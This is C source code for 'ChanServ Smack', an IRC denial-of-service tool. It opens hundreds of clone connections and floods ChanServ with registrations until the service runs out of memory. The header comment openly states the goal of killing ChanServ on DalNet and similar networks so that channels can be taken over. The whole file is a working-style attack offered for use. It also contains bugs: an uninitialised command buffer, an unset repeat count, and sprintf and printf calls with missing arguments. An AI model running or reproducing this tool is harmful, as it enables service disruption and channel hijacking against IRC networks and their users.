/* 
ChanServ.c 
by bansh33 of r00tabega [bansh33@r00tabega.com]
www.r00tabega.com

This program exploits the ChanServ's Auto-Registration
code by overloading it's database and causing it to run out of memory and
fault out due to lack of memory to continue its function on IRC.

Can be used to kill ChanServ and then easily take over channels. 

This program specifically works on DalNet but has been known to work on
other networks such as CobraNet and RelicNet.  Use this program on servers that do
not put a restriction on channel registration flooding.

Based on Sheep.c by nyt (a similar exploit for NickServ)

*/

#include <stdio.h> 
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netinet/in.h> 
#include <sys/socket.h> 
#include <netdb.h>
#include <time.h>
#define version "1.0"

int socplace[500],a,z,clones,repeats,r,ststime;
unsigned int targhost;
struct sockaddr_in sawc[500];
char b[4096],c[4096],d[4096],chan[100],signoff[300],command[1024];

unsigned int lookup(char *host) 
{
  unsigned int addr;
  struct hostent *hostaddr;
  if((hostaddr=gethostbyname(host)) == NULL) 
  {
    printf("could not resolve\n");
    exit(-1);
  }
  bcopy(*(hostaddr->h_addr_list),&(addr),sizeof(hostaddr->h_addr_list));
  return(addr);
}

void usage(char *progname) 
{
  printf("-ChanServ Smack by bansh33 of www.r00tabega.com-\n");
  printf("Based on coding of sheep.c by nyt\n");
  printf("Usage: ./chanserv <server> <port> <clones> <sleep>\n");
  exit(-1);
}
int main(int argc, char *argv[]) 
{
  if(argc != 5) usage(argv[0]);
  targhost=lookup(argv[1]);
  clones=atoi(argv[3]);
  ststime=atoi(argv[4]);
  sprintf(signoff,"quit :ChanServ smack\n");
  printf("\E[2J\E[1;1H");
  printf("ChanServ Smack\n\n",version);
  printf("Server       : %s\n",argv[1]);
  printf("port         : %d\n",atoi(argv[2]));
  printf("Clones       : %d\n",clones);
  printf("Quit delay   : %d\n",ststime);
  printf("Nicknames: ");
  for(a=0;a!=clones;a++) 
    {
    socplace[a]=socket(AF_INET, SOCK_STREAM, 0);
    sawc[a].sin_addr.s_addr = targhost;
    sawc[a].sin_family=AF_INET;
    sawc[a].sin_port=htons(atoi(argv[2]));
      if(connect(socplace[a], (struct sockaddr *)&sawc[a], sizeof(sawc[1])) != 0) 
      {
      perror("connect");
      exit(-1);
      }
    srand(a*time(NULL));
    r=rand();
    sprintf(b,"nick _%d\nuser n%d nope nope :n%d\n",r,r,r);
    write(socplace[a], b, strlen(b));
    printf("n%d, ",r);
    fflush(stdout);
    }
  putchar('\n');
  for(a=0;a!=clones;a++) 
    {
    sprintf(c,"PRIVMSG ChanServ :Register #_%d\nuser alkjfd algeuagleuahgu\n");
    write(socplace[a], c, strlen(c));
    }
  for(a=0;a!=clones;a++) 
    {
    for(z=0;z!=repeats;z++) 
      {
      write(socplace[a], command, strlen(command));
      }
    }
  printf("Now flooding ChanServ with massive registrations...");
  fflush(stdout);
  sleep(ststime);
  printf("\nClosing connection....");
  fflush(stdout);
  strncpy(d,signoff,300);
  for(a=0;a!=clones;a++) 
    {
    write(socplace[a], d, strlen(d));
    }
  sleep(10);
  printf("\nConnection closed. Attack has been completed.");
  fflush(stdout);
return 0;
}